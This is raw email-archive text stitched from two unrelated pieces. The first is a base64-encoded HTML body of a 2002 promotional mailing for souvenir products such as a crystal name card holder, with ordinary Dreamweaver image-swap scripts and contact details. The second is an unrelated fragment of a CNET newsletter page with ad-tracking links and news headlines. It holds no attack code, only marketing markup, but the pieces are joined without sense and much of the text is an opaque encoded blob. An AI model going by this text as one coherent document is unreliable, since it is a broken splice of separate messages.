 CUZPTlQtV0VJR0hUOiBib2xkOyBGT05ULVNJWkU6IDEycHg7IENPTE9SOiAjZmZmZmZmOyBGT05U
 LUZBTUlMWTogIkFyaWFsIiwgIkhlbHZldGljYSIsICJzYW5zLXNlcmlmIjsgVEVYVC1ERUNPUkFU
 SU9OOiBub25lDQp9DQoubm8gew0KCUZPTlQtV0VJR0hUOiBib2xkOyBGT05ULVNJWkU6IDEycHg7
 IENPTE9SOiAjMzM2Njk5OyBGT05ULUZBTUlMWTogIkFyaWFsIiwgIkhlbHZldGljYSIsICJzYW5z
 LXNlcmlmIjsgVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQoudGV4dCB7DQoJRk9OVC1TSVpFOiAx
 MXB4OyBGT05ULUZBTUlMWTogIlZlcmRhbmEiLCAiQXJpYWwiLCAiSGVsdmV0aWNhIiwgInNhbnMt
 c2VyaWYiOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCkEgew0KCUNPTE9SOiAjZmY5OTAwOyBU
 RVhULURFQ09SQVRJT046IHVuZGVybGluZQ0KfQ0KQTpob3ZlciB7DQoJQ09MT1I6ICNmZjY2MDA7
 IFRFWFQtREVDT1JBVElPTjogdW5kZXJsaW5lDQp9DQpBOnZpc2l0ZWQgew0KCVRFWFQtREVDT1JB
 VElPTjogbm9uZQ0KfQ0KLmRhdGUgew0KCUZPTlQtV0VJR0hUOiBib2xkOyBGT05ULVNJWkU6IDEw
 cHg7IENPTE9SOiAjNjY2NjY2OyBGT05ULUZBTUlMWTogIlZlcmRhbmEiLCAiQXJpYWwiLCAiSGVs
 dmV0aWNhIiwgInNhbnMtc2VyaWYiOyBURVhULURFQ09SQVRJT046IG5vbmUNCn0NCjwvU1RZTEU+
 DQoNCjxTQ1JJUFQgbGFuZ3VhZ2U9SmF2YVNjcmlwdD4NCjwhLS0NCmZ1bmN0aW9uIE1NX3N3YXBJ
 bWdSZXN0b3JlKCkgeyAvL3YzLjANCiAgdmFyIGkseCxhPWRvY3VtZW50Lk1NX3NyOyBmb3IoaT0w
 O2EmJmk8YS5sZW5ndGgmJih4PWFbaV0pJiZ4Lm9TcmM7aSsrKSB4LnNyYz14Lm9TcmM7DQp9DQoN
 CmZ1bmN0aW9uIE1NX3ByZWxvYWRJbWFnZXMoKSB7IC8vdjMuMA0KICB2YXIgZD1kb2N1bWVudDsg
 aWYoZC5pbWFnZXMpeyBpZighZC5NTV9wKSBkLk1NX3A9bmV3IEFycmF5KCk7DQogICAgdmFyIGks
 aj1kLk1NX3AubGVuZ3RoLGE9TU1fcHJlbG9hZEltYWdlcy5hcmd1bWVudHM7IGZvcihpPTA7IGk8
 YS5sZW5ndGg7IGkrKykNCiAgICBpZiAoYVtpXS5pbmRleE9mKCIjIikhPTApeyBkLk1NX3Bbal09
 bmV3IEltYWdlOyBkLk1NX3BbaisrXS5zcmM9YVtpXTt9fQ0KfQ0KDQpmdW5jdGlvbiBNTV9maW5k
 T2JqKG4sIGQpIHsgLy92My4wDQogIHZhciBwLGkseDsgIGlmKCFkKSBkPWRvY3VtZW50OyBpZigo
 cD1uLmluZGV4T2YoIj8iKSk+MCYmcGFyZW50LmZyYW1lcy5sZW5ndGgpIHsNCiAgICBkPXBhcmVu
 dC5mcmFtZXNbbi5zdWJzdHJpbmcocCsxKV0uZG9jdW1lbnQ7IG49bi5zdWJzdHJpbmcoMCxwKTt9
 DQogIGlmKCEoeD1kW25dKSYmZC5hbGwpIHg9ZC5hbGxbbl07IGZvciAoaT0wOyF4JiZpPGQuZm9y
 bXMubGVuZ3RoO2krKykgeD1kLmZvcm1zW2ldW25dOw0KICBmb3IoaT0wOyF4JiZkLmxheWVycyYm
 aTxkLmxheWVycy5sZW5ndGg7aSsrKSB4PU1NX2ZpbmRPYmoobixkLmxheWVyc1tpXS5kb2N1bWVu
 dCk7IHJldHVybiB4Ow0KfQ0KDQpmdW5jdGlvbiBNTV9zd2FwSW1hZ2UoKSB7IC8vdjMuMA0KICB2
 YXIgaSxqPTAseCxhPU1NX3N3YXBJbWFnZS5hcmd1bWVudHM7IGRvY3VtZW50Lk1NX3NyPW5ldyBB
 cnJheTsgZm9yKGk9MDtpPChhLmxlbmd0aC0yKTtpKz0zKQ0KICAgaWYgKCh4PU1NX2ZpbmRPYmoo
 YVtpXSkpIT1udWxsKXtkb2N1bWVudC5NTV9zcltqKytdPXg7IGlmKCF4Lm9TcmMpIHgub1NyYz14
 LnNyYzsgeC5zcmM9YVtpKzJdO30NCn0NCi8vLS0+DQo8L1NDUklQVD4NCjxCQVNFIGhyZWY9aHR0
 cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNvbS9vbmVjdXN0b21lci9lbWFpbC9pbXBv
 cnQvMTI2Lz4NCjxUQUJMRSBjZWxsU3BhY2luZz0wIGNlbGxQYWRkaW5nPTAgd2lkdGg9NTUwIGJv
 cmRlcj0wPg0KICA8VEJPRFk+DQogIDxUUj4NCiAgICA8VEQ+DQogICAgICA8VEFCTEUgY2VsbFNw
 YWNpbmc9MCBjZWxsUGFkZGluZz0wIHdpZHRoPSIxMDAlIiBib3JkZXI9MD4NCiAgICAgICAgPFRC
 T0RZPg0KICAgICAgICA8VFI+DQogICAgICAgICAgPFREIHJvd1NwYW49Mz48SU1HIGhlaWdodD02
 NiANCiAgICAgICAgICAgIHNyYz0iaHR0cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNv
 bS9vbmVjdXN0b21lci9lbWFpbC9pbXBvcnQvMTI2L2ltYWdlcy9jaG9pY2UuZ2lmIiANCiAgICAg
 ICAgICAgIHdpZHRoPTExNT48L1REPg0KICAgICAgICAgIDxURD48SU1HIGhlaWdodD00NCANCiAg
 ICAgICAgICAgIHNyYz0iaHR0cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNvbS9vbmVj
 dXN0b21lci9lbWFpbC9pbXBvcnQvMTI2L2ltYWdlcy90eXBvLmdpZiIgDQogICAgICAgICAgICB3
 aWR0aD00NTk+PC9URD48L1RSPg0KICAgICAgICA8VFI+DQogICAgICAgICAgPFREPg0KICAgICAg
 ICAgICAgPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9MCB3aWR0aD0iMTAwJSIgDQog
 ICAgICAgICAgICBiYWNrZ3JvdW5kPWh0dHA6Ly9raWZ1bmdhZG1pbi5iZXlvbmRpbWVuc2lvbi5j
 b20vb25lY3VzdG9tZXIvZW1haWwvaW1wb3J0LzEyNi9pbWFnZXMvbGluZV9iZ2QuZ2lmIA0KICAg
 ICAgICAgICAgYm9yZGVyPTA+DQogICAgICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAgICAg
 PFRSPg0KICAgICAgICAgICAgICAgIDxURD48SU1HIGhlaWdodD0xNyANCiAgICAgICAgICAgICAg
 ICAgIHNyYz0iaHR0cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNvbS9vbmVjdXN0b21l
 ci9lbWFpbC9pbXBvcnQvMTI2L2ltYWdlcy9jb3B5cmlnaHQuZ2lmIiANCiAgICAgICAgICAgICAg
 ICAgIHdpZHRoPTE5NT48L1REPjwhLS0gZW5ld3MgZGF0ZSAtLT4NCiAgICAgICAgICAgICAgICA8
 VEQgY2xhc3M9ZGF0ZSBhbGlnbj1yaWdodD48U1BBTiBpZD1kYXRlIA0KPz4zMC4wNy4yMDAyPC9T
 UEFOPjwvVEQ+DQogICAgICAgICAgICAgICAgPFREIGFsaWduPXJpZ2h0PjxJTUcgaGVpZ2h0PTUg
 DQogICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9raWZ1bmdhZG1pbi5iZXlvbmRpbWVuc2lv
 bi5jb20vb25lY3VzdG9tZXIvZW1haWwvaW1wb3J0LzEyNi9pbWFnZXMvc3BhY2VyLmdpZiIgDQog
 ICAgICAgICAgICAgICAgICB3aWR0aD01PjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9URD48
 L1RSPg0KICAgICAgICA8VFI+DQogICAgICAgICAgPFREPjxJTUcgaGVpZ2h0PTUgDQogICAgICAg
 ICAgICBzcmM9Imh0dHA6Ly9raWZ1bmdhZG1pbi5iZXlvbmRpbWVuc2lvbi5jb20vb25lY3VzdG9t
 ZXIvZW1haWwvaW1wb3J0LzEyNi9pbWFnZXMvc3BhY2VyLmdpZiIgDQogICAgICAgICAgICB3aWR0
 aD01PjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9URD48L1RSPg0KICA8VFI+DQogICAgPFRE
 IA0KICAgIGJhY2tncm91bmQ9aHR0cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNvbS9v
 bmVjdXN0b21lci9lbWFpbC9pbXBvcnQvMTI2L2ltYWdlcy9iZ2QuZ2lmPg0KICAgICAgPFRBQkxF
 IGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9MCB3aWR0aD0iMTAwJSIgYm9yZGVyPTA+DQogICAg
 ICAgIDxUQk9EWT4NCiAgICAgICAgPFRSPg0KICAgICAgICAgIDxURCB2QWxpZ249dG9wPg0KICAg
 ICAgICAgICAgPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9MCB3aWR0aD0iMTAwJSIg
 Ym9yZGVyPTA+DQogICAgICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAgICAgPFRSPg0KICAg
 ICAgICAgICAgICAgIDxURD48SU1HIGhlaWdodD0zMzYgDQogICAgICAgICAgICAgICAgICBzcmM9
 Imh0dHA6Ly9raWZ1bmdhZG1pbi5iZXlvbmRpbWVuc2lvbi5jb20vb25lY3VzdG9tZXIvZW1haWwv
 aW1wb3J0LzEyNi9pbWFnZXMvc3BhY2VyLmdpZiIgDQogICAgICAgICAgICAgICAgICB3aWR0aD0y
 MD48L1REPg0KICAgICAgICAgICAgICAgIDxURCB2QWxpZ249dG9wPg0KICAgICAgICAgICAgICAg
 ICAgPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9MCB3aWR0aD0yMDAgYm9yZGVyPTA+
 DQogICAgICAgICAgICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAgICAgICAgICAgPFRSPg0K
 ICAgICAgICAgICAgICAgICAgICAgIDxURD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDxUQUJM
 RSBjZWxsU3BhY2luZz0wIGNlbGxQYWRkaW5nPTAgd2lkdGg9IjEwMCUiIA0KYm9yZGVyPTA+DQog
 ICAgICAgICAgICAgICAgICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAgICAgICAgICAgICAg
 ICAgPFRSPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxURD48SU1HIGhlaWdodD0zNiAN
 CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0cDovL2tpZnVuZ2FkbWluLmJl
 eW9uZGltZW5zaW9uLmNvbS9vbmVjdXN0b21lci9lbWFpbC9pbXBvcnQvMTI2L2ltYWdlcy9zcGFj
 ZXIuZ2lmIiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdpZHRoPTEwPjwvVEQ+PCEt
 LSBjaG9pY2VfcHJvZHVjdCBuYW1lIC0tPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxU
 RCBhbGlnbj1yaWdodD48U1BBTiBjbGFzcz1uYW1lPjxTUEFOIA0KICAgICAgICAgICAgICAgICAg
 ICAgICAgICAgICAgaWQ9Y2hvaWNlX3Byb2R1Y3RfbmFtZSA/PkNyeXN0YWwgTmFtZSBDYXJkIA0K
 ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG9sZGVyPC9TUEFOPjwvU1BBTj48QlI+PCEt
 LSBjaG9pY2VfcHJvZHVjdCBudW1iZXIgLS0+PFNQQU4gDQogICAgICAgICAgICAgICAgICAgICAg
 ICAgICAgICBjbGFzcz1ubz48U1BBTiBpZD1jaG9pY2VfcHJvZHVjdF9ubyANCiAgICAgICAgICAg
 ICAgICAgICAgICAgICAgICAgID8+PC9TUEFOPjwvU1BBTj48L1REPjwvVFI+PC9UQk9EWT48L1RB
 QkxFPjwvVEQ+PC9UUj4NCiAgICAgICAgICAgICAgICAgICAgPFRSPjwhLS0gY2hvaWNlX3Byb2R1
 Y3QgcGhvdG8gLS0+DQogICAgICAgICAgICAgICAgICAgICAgPFREPjxJTUcgaWQ9SW1nX2Nob2lj
 ZV9wcm9kdWN0X3Bob3RvIA0KICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8va2lm
 dW5nYWRtaW4uYmV5b25kaW1lbnNpb24uY29tL29uZWN1c3RvbWVyL2VtYWlsL2ltcG9ydC8xMjYv
 aW1hZ2VzL2NyeXN0YWwxLmpwZyI+PC9URD48L1RSPg0KICAgICAgICAgICAgICAgICAgICA8VFI+
 DQogICAgICAgICAgICAgICAgICAgICAgPFREPjxJTUcgaGVpZ2h0PTIwIA0KICAgICAgICAgICAg
 ICAgICAgICAgICAgc3JjPSJodHRwOi8va2lmdW5nYWRtaW4uYmV5b25kaW1lbnNpb24uY29tL29u
 ZWN1c3RvbWVyL2VtYWlsL2ltcG9ydC8xMjYvaW1hZ2VzL3NwYWNlci5naWYiIA0KICAgICAgICAg
 ICAgICAgICAgICAgICAgd2lkdGg9MTA+PC9URD48L1RSPjwhLS0gZW5ld3MgbWVzc2FnZXMgLS0+
 DQogICAgICAgICAgICAgICAgICAgIDxUUj4NCiAgICAgICAgICAgICAgICAgICAgICA8VEQgY2xh
 c3M9dGV4dD48U1BBTiBpZD1tZXNzYWdlcyA/PjxGT05UIA0KICAgICAgICAgICAgICAgICAgICAg
 ICAgY29sb3I9IzMzMzMzMz5BbiBlZmZlY3RpdmUgYW5kIGVhc3kgd2F5IHRvIGZpbmQgeW91ciAN
 CiAgICAgICAgICAgICAgICAgICAgICAgIHByb21vdGlvbmFsIHNvdXZlbmlyLiBQbGVhc2UgYWxz
 byB2aXNpdCB1cyBhdCA8QSANCiAgICAgICAgICAgICAgICAgICAgICAgIGhyZWY9Imh0dHA6Ly9r
 aWZ1bmdhZG1pbi5iZXlvbmRpbWVuc2lvbi5jb20vb25lY3VzdG9tZXIvZW1haWwvbGluay5hc3A/
 Y2lkPSZhbXA7Y2FtcGlkPTA3SnVsMDImYW1wO3NMaW5rPWh0dHAlM0EvL3d3dy5raWZ1bmdhZC5j
 b20vJmFtcDtzQ29tcGFueT1raWZ1bmciPnd3dy5raWZ1bmdhZC5jb208L0E+IA0KICAgICAgICAg
 ICAgICAgICAgICAgICAgdG8gZmluZCBvdXQgbW9yZSEgPEJSPjxCUj5TaW1wbHkgZ2l2ZSB1cyBh
 IGNhbGwgYXQgDQogICAgICAgICAgICAgICAgICAgICAgICAoODUyKTI4ODcgODU0NiBvciBlbWFp
 bCB0byA8QSANCiAgICAgICAgICAgICAgICAgICAgICAgIGhyZWY9Imh0dHA6Ly9raWZ1bmdhZG1p
 bi5iZXlvbmRpbWVuc2lvbi5jb20vb25lY3VzdG9tZXIvZW1haWwvbGluay5hc3A/Y2lkPSZhbXA7
 Y2FtcGlkPTA3SnVsMDImYW1wO3NMaW5rPW1haWx0byUzQWluZm9Aa2lmdW5nYWQuY29tJmFtcDtz
 Q29tcGFueT1raWZ1bmciPmluZm9Aa2lmdW5nYWQuY29tPC9BPjwvRk9OVD48L1NQQU4+PC9URD48
 L1RSPg0KICAgICAgICAgICAgICAgICAgICA8VFI+DQogICAgICAgICAgICAgICAgICAgICAgPFRE
 PjxJTUcgaGVpZ2h0PTEwIA0KICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8va2lm
 dW5nYWRtaW4uYmV5b25kaW1lbnNpb24uY29tL29uZWN1c3RvbWVyL2VtYWlsL2ltcG9ydC8xMjYv
 aW1hZ2VzL3NwYWNlci5naWYiIA0KICAgICAgICAgICAgICAgICAgICAgICAgd2lkdGg9MjI3Pjwv
 VEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9URD4NCiAgICAgICAgICAgICAgICA8VEQ+PElNRyBo
 ZWlnaHQ9MzM2IA0KICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8va2lmdW5nYWRtaW4uYmV5
 b25kaW1lbnNpb24uY29tL29uZWN1c3RvbWVyL2VtYWlsL2ltcG9ydC8xMjYvaW1hZ2VzL3NwYWNl
 ci5naWYiIA0KICAgICAgICAgICAgICAgICAgd2lkdGg9MjA+PC9URD48L1RSPjwvVEJPRFk+PC9U
 QUJMRT48L1REPg0KICAgICAgICAgIDxURCB2QWxpZ249dG9wPg0KICAgICAgICAgICAgPFRBQkxF
 IGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9MCB3aWR0aD0iMTAwJSIgYm9yZGVyPTA+DQogICAg
 ICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAgICAgPFRSIGFsaWduPXJpZ2h0Pg0KICAgICAg
 ICAgICAgICAgIDxURD48SU1HIGhlaWdodD0yNiANCiAgICAgICAgICAgICAgICAgIHNyYz0iaHR0
 cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNvbS9vbmVjdXN0b21lci9lbWFpbC9pbXBv
 cnQvMTI2L2ltYWdlcy9ob3RpdGVtcy5naWYiIA0KICAgICAgICAgICAgICAgICAgd2lkdGg9Nzc+
 PC9URD48L1RSPg0KICAgICAgICAgICAgICA8VFI+DQogICAgICAgICAgICAgICAgPFREPg0KICAg
 ICAgICAgICAgICAgICAgPFRBQkxFIGNlbGxTcGFjaW5nPTAgY2VsbFBhZGRpbmc9MCB3aWR0aD0i
 MTAwJSIgYm9yZGVyPTE+DQogICAgICAgICAgICAgICAgICAgIDxUQk9EWT4NCiAgICAgICAgICAg
 ICAgICAgICAgPFRSPg0KICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0iNTAlIj48IS0t
 IEhvdCBpdGVtIDEgcGhvdG8gLS0+PFNQQU4+PElNRyANCiAgICAgICAgICAgICAgICAgICAgICAg
 IGlkPUltZ19ob3RfaXRlbV9waG90b18xIA0KICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJo
 dHRwOi8va2lmdW5nYWRtaW4uYmV5b25kaW1lbnNpb24uY29tL29uZWN1c3RvbWVyL2VtYWlsL2lt
 cG9ydC8xMjYvaW1hZ2VzL2JhZ19maW5hbC5qcGciPjwvU1BBTj48L1REPg0KICAgICAgICAgICAg
 ICAgICAgICAgIDxURD48SU1HIGhlaWdodD0xMzUgDQogICAgICAgICAgICAgICAgICAgICAgICBz
 cmM9Imh0dHA6Ly9raWZ1bmdhZG1pbi5iZXlvbmRpbWVuc2lvbi5jb20vb25lY3VzdG9tZXIvZW1h
 aWwvaW1wb3J0LzEyNi9pbWFnZXMvYS5naWYiIA0KICAgICAgICAgICAgICAgICAgICAgICAgd2lk
 dGg9Mz48L1REPg0KICAgICAgICAgICAgICAgICAgICAgIDxURCB3aWR0aD0iNTAlIj48IS0tIEhv
 dCBpdGVtIDIgcGhvdG8gLS0+PFNQQU4+PElNRyANCiAgICAgICAgICAgICAgICAgICAgICAgIGlk
 PUltZ19ob3RfaXRlbV9waG90b18yIA0KICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRw
 Oi8va2lmdW5nYWRtaW4uYmV5b25kaW1lbnNpb24uY29tL29uZWN1c3RvbWVyL2VtYWlsL2ltcG9y
 dC8xMjYvaW1hZ2VzL21lbW9fZmluYWwuanBnIj48L1NQQU4+PC9URD48L1RSPg0KICAgICAgICAg
 ICAgICAgICAgICA8VFI+DQogICAgICAgICAgICAgICAgICAgICAgPFREIGNvbFNwYW49Mz48SU1H
 IGhlaWdodD0zIA0KICAgICAgICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8va2lmdW5nYWRt
 aW4uYmV5b25kaW1lbnNpb24uY29tL29uZWN1c3RvbWVyL2VtYWlsL2ltcG9ydC8xMjYvaW1hZ2Vz
 L2IuZ2lmIiANCiAgICAgICAgICAgICAgICAgICAgICAgIHdpZHRoPTI3Mz48L1REPjwvVFI+DQog
 ICAgICAgICAgICAgICAgICAgIDxUUj4NCiAgICAgICAgICAgICAgICAgICAgICA8VEQ+PCEtLSBI
 b3QgaXRlbSAzIHBob3RvIC0tPjxTUEFOPjxJTUcgDQogICAgICAgICAgICAgICAgICAgICAgICBp
 ZD1JbWdfaG90X2l0ZW1fcGhvdG9fMyANCiAgICAgICAgICAgICAgICAgICAgICAgIHNyYz0iaHR0
 cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNvbS9vbmVjdXN0b21lci9lbWFpbC9pbXBv
 cnQvMTI2L2ltYWdlcy9idWJibGVfbmV3LmpwZyI+PC9TUEFOPjwvVEQ+DQogICAgICAgICAgICAg
 ICAgICAgICAgPFREPjxJTUcgaGVpZ2h0PTEzNSANCiAgICAgICAgICAgICAgICAgICAgICAgIHNy
 Yz0iaHR0cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNvbS9vbmVjdXN0b21lci9lbWFp
 bC9pbXBvcnQvMTI2L2ltYWdlcy9jLmdpZiIgDQogICAgICAgICAgICAgICAgICAgICAgICB3aWR0
 aD0zPjwvVEQ+DQogICAgICAgICAgICAgICAgICAgICAgPFREPjwhLS0gSG90IGl0ZW0gNCBwaG90
 byAtLT48U1BBTj48SU1HIA0KICAgICAgICAgICAgICAgICAgICAgICAgaWQ9SW1nX2hvdF9pdGVt
 X3Bob3RvXzQgDQogICAgICAgICAgICAgICAgICAgICAgICBzcmM9Imh0dHA6Ly9raWZ1bmdhZG1p
 bi5iZXlvbmRpbWVuc2lvbi5jb20vb25lY3VzdG9tZXIvZW1haWwvaW1wb3J0LzEyNi9pbWFnZXMv
 UGVuU2V0X25ldy5qcGciPjwvU1BBTj48L1REPjwvVFI+PC9UQk9EWT48L1RBQkxFPjwvVEQ+PC9U
 Uj4NCiAgICAgICAgICAgICAgPFRSPg0KICAgICAgICAgICAgICAgIDxURD48SU1HIGhlaWdodD0x
 MiANCiAgICAgICAgICAgICAgICAgIHNyYz0iaHR0cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5z
 aW9uLmNvbS9vbmVjdXN0b21lci9lbWFpbC9pbXBvcnQvMTI2L2ltYWdlcy9kLmdpZiIgDQogICAg
 ICAgICAgICAgICAgICB3aWR0aD0yNzM+PC9URD48L1RSPg0KICAgICAgICAgICAgICA8VFIgYWxp
 Z249cmlnaHQ+DQogICAgICAgICAgICAgICAgPFREPjxBIA0KICAgICAgICAgICAgICAgICAgb25t
 b3VzZW92ZXI9Ik1NX3N3YXBJbWFnZSgnbW9yZScsJycsJ2ltYWdlcy9tb3JlX28uZ2lmJywxKSIg
 DQogICAgICAgICAgICAgICAgICBvbm1vdXNlb3V0PU1NX3N3YXBJbWdSZXN0b3JlKCkgDQogICAg
 ICAgICAgICAgICAgICBocmVmPSJodHRwOi8va2lmdW5nYWRtaW4uYmV5b25kaW1lbnNpb24uY29t
 L29uZWN1c3RvbWVyL2VtYWlsL2xpbmsuYXNwP2NpZD0mYW1wO2NhbXBpZD0wN0p1bDAyJmFtcDtz
 TGluaz1odHRwJTNBLy93d3cua2lmdW5nYWQuY29tLyZhbXA7c0NvbXBhbnk9a2lmdW5nIj48L0E+
 PC9URD48L1RSPg0KICAgICAgICAgICAgICA8VFI+DQogICAgICAgICAgICAgICAgPFREPjxJTUcg
 aGVpZ2h0PTEwIA0KICAgICAgICAgICAgICAgICAgc3JjPSJodHRwOi8va2lmdW5nYWRtaW4uYmV5
 b25kaW1lbnNpb24uY29tL29uZWN1c3RvbWVyL2VtYWlsL2ltcG9ydC8xMjYvaW1hZ2VzL3NwYWNl
 ci5naWYiIA0KICAgICAgICAgICAgICAgICAgd2lkdGg9NTA+PC9URD48L1RSPjwvVEJPRFk+PC9U
 QUJMRT48L1REPg0KICAgICAgICAgIDxURD48SU1HIGhlaWdodD0zMzYgDQogICAgICAgICAgICBz
 cmM9Imh0dHA6Ly9raWZ1bmdhZG1pbi5iZXlvbmRpbWVuc2lvbi5jb20vb25lY3VzdG9tZXIvZW1h
 aWwvaW1wb3J0LzEyNi9pbWFnZXMvYzMuZ2lmIiANCiAgICAgICAgICAgIHdpZHRoPTM0PjwvVEQ+
 PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9URD48L1RSPg0KICA8VFI+DQogICAgPFREIA0KICAgIGJh
 Y2tncm91bmQ9aHR0cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNvbS9vbmVjdXN0b21l
 ci9lbWFpbC9pbXBvcnQvMTI2L2ltYWdlcy9lLmdpZj4NCiAgICAgIDxUQUJMRSBjZWxsU3BhY2lu
 Zz0wIGNlbGxQYWRkaW5nPTAgd2lkdGg9IjEwMCUiIGJvcmRlcj0wPg0KICAgICAgICA8VEJPRFk+
 DQogICAgICAgIDxUUj4NCiAgICAgICAgICA8VEQ+PElNRyBoZWlnaHQ9MzAgDQogICAgICAgICAg
 ICBzcmM9Imh0dHA6Ly9raWZ1bmdhZG1pbi5iZXlvbmRpbWVuc2lvbi5jb20vb25lY3VzdG9tZXIv
 ZW1haWwvaW1wb3J0LzEyNi9pbWFnZXMvZm9vdGVyMS5naWYiIA0KICAgICAgICAgICAgd2lkdGg9
 NDg2PjwvVEQ+DQogICAgICAgICAgPFREIHJvd1NwYW49Mj48SU1HIGhlaWdodD01OCANCiAgICAg
 ICAgICAgIHNyYz0iaHR0cDovL2tpZnVuZ2FkbWluLmJleW9uZGltZW5zaW9uLmNvbS9vbmVjdXN0
 b21lci9lbWFpbC9pbXBvcnQvMTI2L2ltYWdlcy9sb2dvLmdpZiIgDQogICAgICAgICAgICB3aWR0
 aD04OD48L1REPjwvVFI+DQogICAgICAgIDxUUj4NCiAgICAgICAgICA8VEQ+PElNRyBoZWlnaHQ9
 MjggDQogICAgICAgICAgICBzcmM9Imh0dHA6Ly9raWZ1bmdhZG1pbi5iZXlvbmRpbWVuc2lvbi5j
 b20vb25lY3VzdG9tZXIvZW1haWwvaW1wb3J0LzEyNi9pbWFnZXMvZm9vdGVyMi5naWYiIA0KICAg
 ICAgICAgICAgd2lkdGg9NDg2PjwvVEQ+PC9UUj48L1RCT0RZPjwvVEFCTEU+PC9URD48L1RSPjwv
 VEJPRFk+PC9UQUJMRT48L0JPRFk+PC9IVE1MPg0K
 ------=_NextPart_hzG8dMSOY9olT2Ty--
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;File-traders in the crosshairs&lt;/title&gt;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 Towerboard --&gt;
 	&lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=13-NxSZI3XW8S97AuhssDLfzpHOCerR" target="new"&gt;   
 &lt;img src="http://ad.doubleclick.net/ad/N1090.cnet/B926801.16;sz=160x600;ord=[timestamp]?" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=28-A2wXIRd4w3YU_u4EL2t1VlTK8yiR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3d-oi9NIbz4YXtdakcvwlGWUTnaNtPR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=52-LUXoIrJtdRNUUC9MWz8AtIQwjjnR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDqn6Owp9WhKPAKa1CPIuR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7d-FFEqIDLPzEEgN5RUywq2NRJSBTZR"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15, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 File-traders in the crosshairs&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Will IBM's new "Shark" sink or swim?&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 HP exits e-business software market&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Security's the message for Exchange&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Hack attacks on Linux on the rise&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
